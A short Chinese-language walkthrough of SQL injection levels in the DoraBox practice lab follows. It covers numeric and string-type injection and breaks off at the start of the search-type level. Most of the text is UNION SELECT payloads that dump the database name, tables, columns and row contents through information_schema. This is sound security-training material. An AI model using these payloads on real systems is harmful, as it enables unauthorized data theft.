Sql注入
直接开始第一关,sql注入数字型
源码中id是htmlspecialchars过滤的,过滤是过滤单引号,双引号,尖括号和&的,但是过滤的是html实体并不会影响我们的操作
-1 union select 1,2,3
爆数据库:-1 union select 1,user(),database()
爆表:-1 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
爆列名:-1 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='news'
爆值:-1 UNION SELECT 1,2,concat_ws('|',id,title,content) from news
下一关
Sql注入字符型
这关和之前是差不多的,就是要闭合一下单引号即可
DoraBox' and '1'='2' union select 1,2,3'&submit=submit
爆表:DoraBox' and '1'='2' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
DoraBox' and '1'='2' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='news'--
DoraBox' and '1'='2' UNION SELECT 1,2,concat_ws('|',id,title,content) from news--
下一关
Sql注入搜索型
这里百分号和单引号都需要闭合